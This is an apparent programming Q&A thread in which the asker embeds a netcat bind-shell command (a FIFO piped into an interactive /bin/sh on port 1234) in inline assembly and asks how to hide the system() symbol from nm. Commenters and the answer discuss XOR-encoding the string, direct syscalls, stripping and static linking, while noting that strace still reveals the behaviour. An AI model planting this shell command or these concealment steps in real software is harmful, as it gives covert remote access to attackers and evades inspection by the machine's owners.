# Call C functions without showing them with a NM command

Tags: c, assembly

I have the following asm code :

```
int  main(void)
{
    __asm__("   subq    $16, %rsp\n"
            "leaq   L_.str(%rip), %rdi\n"
            "movb   $0, %al\n"
            "callq  _system\n"
            "xorl   %ecx, %ecx\n"
            "movl   %eax, -4(%rbp)\n" 
            "movl   %ecx, %eax\n"
            "addq   $16, %rsp\n"
            "popq   %rbp\n"
            ".section   __TEXT,__cstring,cstring_literals\n"
            "L_.str:\n"
            ".asciz \"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lk 1234 > /tmp/f\"\n"
            "retq\n");
}
```

And it's equal to :

```
system("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lk 1234 > /tmp/f");
```

I'm doing it using C language, and when I compile both, and do a NM on the executable, we can see the _system functions in symbols.

My question is  : How can you hide this symbol on NM command, by doing something in the ASM code ?

Comment: You can't (directly). The `system` invocation requires that exact string. You could write some sort of translation that takes an encrypted string, decrypts it and then calls `system`. If you want to go to that extent.

Comment: If your concern is only the direct visibility in binary, than simply encode the string somehow, even simple `xor 0xAA` would make it unreadable for human. It will still show `strace` of course, as you must decode it before sending to `system`. I think it's even possible to encode the line itself - so system would do the final part of decoding, hiding things like "/tmp" by using some shell scripting. Anyway, there's no reason to hide this, unless it is something malicious, so don't waste your time, when you can work on something good meanwhile. Life is short, and breaking modern IT is too easy.

Comment: It's only for educational purpose, do you have an example please ?

Comment: You may try something like http://www.enscryption.com/index.html (I never did, no idea how good they are). Or just learn `sh` syntax (I tried few times, but keep forgetting it like instantly) and do some basic string operations to calculate that final version from other values, so you wil do something like `system("commands to build result string and doing /bin/sh result, ie. system in system");` And on top of that you can do simple `xor` or something in C, so the binary will not even show that string send to `system`, that will be only visible during runtime. No example, waste of time, bye.

Comment: Basically I don't get why do you want it. It's not really preventing anyone skilled from extracting the target script, it's just making it a bit more tedious, but it's not like "protection", it's good against kids at most. It's like the magic "obfuscation" required by every corporation, because they think it's doing something. :D .. best joke, you can sell it to them!! :D And not cheaply. :))) Ridiculous...

Comment: You can not, unless you have a modified libc library. But you could issue syscalls directly, bypassing libc and the names of these syscalls...

Comment: Oh, and I actually missed the main question, linuxfan comment is more to the point, sorry for confusion, I didn't even think about hiding "system" itself, as you are calling it, so it's obviously not going away. But even if you would hide it by some way, `strace` will show all your calls, so you can't win anything there.

Answer (score 0):

One option is to *strip* the binary after linking. This removes the symbol table and all symbols. This can either be achieved by passing `-s` in the linking stage or by invoking `strip` on the resulting binary.

Note though that because the libc is likely loaded as a shared library, the string `_system` is going to appear in your binary to look it up in the libc anyqay. To get rid of that, too, you would need to link against the libc statically (gcc accepts `-static` for that purpose). However, even then it is likely easy to deduce what your program is doing by tracing what system calls it makes (e.g. with a utility like `truss`).